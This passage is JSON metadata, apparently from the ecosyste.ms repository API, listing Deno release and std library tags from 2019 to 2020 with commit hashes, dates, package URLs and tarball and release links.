2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codel